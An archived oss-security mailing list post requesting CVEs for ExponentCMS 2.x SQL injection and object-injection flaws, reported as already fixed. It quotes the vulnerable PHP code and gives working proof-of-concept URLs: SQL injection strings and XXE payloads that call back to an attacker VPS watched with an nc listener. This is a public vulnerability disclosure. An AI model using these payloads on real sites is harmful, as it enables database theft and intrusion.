Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <CAEiFw0WzL4iVgrZYJsoizHbX8_s+tgGc4xJDnYgr1y4SVv=UrA@mail.gmail.com>
Date: Fri, 30 Sep 2016 12:22:38 +0800
From: Carl Peng <felixk3y@...il.com>
To: oss-security@...ts.openwall.com
Subject: CVE request: ExponentCMS 2.x Object Injection and SQLi vulnerabilities

hello,
I reported the following vulnerabilities to the ExponentCMS team some days
ago, and now has been fixed.

1) sqli-1
/framework/modules/ecommerce/controllers/cartController.php
lines 61 - 66:
```
$product_type = isset($this->params['product_type']) ?
$this->params['product_type'] : 'product';
$product      = new product();
//if we're trying to add a parent product ONLY, then we redirect to it's
show view
$c = new stdClass();
if (isset($this->params['product_id']) && empty($this->params['children']))
$c = $product->find('first', 'parent_id=' . $this->params['product_id']);
//sqli
if (!empty($c->id)) {
flash('message', gt("Please select a product and quantity from the options
listed below to add to your cart."));
redirect_to(array('controller'=> 'store', 'action'=> 'show', 'id'=>
$this->params['product_id']));
}
```
the parameter of "product_id" fail to filtered, we can input
"product_id=sqli" to execute SQL statements.
Proof of concept:
/index.php?controller=cart&action=addItem&product_id=-1/**/and/**/1=if(1,sleep(1),0)%23

2) sqli-2
/framework/modules/help/controllers/helpController.php
lines 122 - 131:
```
if (empty($this->params['version']) || $this->params['version'] ==
'current') {
            $version_id = help_version::getCurrentHelpVersionId();
   } else {
            $version_id =
help_version::getHelpVersionId($this->params['version']); //sqli
            if (empty($version_id)) {
                $version_id = help_version::getCurrentHelpVersionId();
            }
   }
   $doc = $help->find('first', 'help_version_id='.$version_id.' AND
sef_url="'.$this->params['title'].'"'); //sqli
        $children = $help->find('count','parent='.$doc->id);
```
The parameters of "version" and "title" fail to filtered, we can input
"version=sqli" or "title=sqli"to execute SQL statements.
Proof of concept:
/index.php?controller=help&action=show&version=1" union select
1%23&title=aaa" union select
1,user(),3,4,5,6,7,8,9,0,11,12,1,2,3,4,5,6,7,8,9,0,11,12%23

3) Object Injection -1
/framework/modules/core/controllers/expTagController.php#L228-L232
```
foreach ($this->params['change_tag'] as $item) { // $item from user input
    $params['expTag'] = array();
    $classname = $this->params['mod'];
    $object = new $classname($item); // $classname also from user input
    expTag::deleteTag($this->params['mod'], $object->id);
    //...
}
```
Proof of concept(XXE):
[ We could use php class "SimpleXMLElement"(
http://cn2.php.net/manual/en/simplexmlelement.construct.php) to exploit it ]
step 1:
VPS listening.. (nc -lvvp 8080)
step 2:
/index.php?controller=expTag&action=change_tags&mod=SimpleXMLElement&change_tag[]=%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fvps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E

4) Object Injection -2
/framework/modules/core/controllers/expCatController.php#L175-L182
```
if (!empty($this->params['change_cat'])) {
foreach ($this->params['change_cat'] as $item) {
$classname = $this->params['mod'];
$object = new $classname($item);
$params['expCat'][0] = $this->params['newcat'];
$object->update($params);
}
}
```
Proof of concept(XXE):
[ We could use php class "SimpleXMLElement"(
http://cn2.php.net/manual/en/simplexmlelement.construct.php) to exploit it ]
step 1:
VPS listening.. (nc -lvvp 8080)
step 2:
/index.php?controller=expCat&action=change_cats&mod=SimpleXMLElement&change_cat[]=%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2F%2Fyour_vps_ip%3A8080%2Fxxe_exists%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E

[root@...ud ~]# nc -lvvp 8080
Listening on any address 8080 (webcache)
Connection from 8.8.8.8:63017
GET /xxe_exists HTTP/1.0
Host: your_vps_ip:8080


And now, all vulnerabilities have been fixed.
https://github.com/exponentcms/exponent-cms/commit/99636b2118cd9af4eb9920f6b6c228bd824593d2
https://github.com/exponentcms/exponent-cms/commit/fdafb5ec97838e4edbd685f587f28d3174ebb3db

these issues was reported by Peng Hua of silence.com.cn Inc. and I would
like to request CVEs for these issues (if not done so).

-------------------http://www.silence.com.cn/
penghua@...ence.com.cn
PKAV Team

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.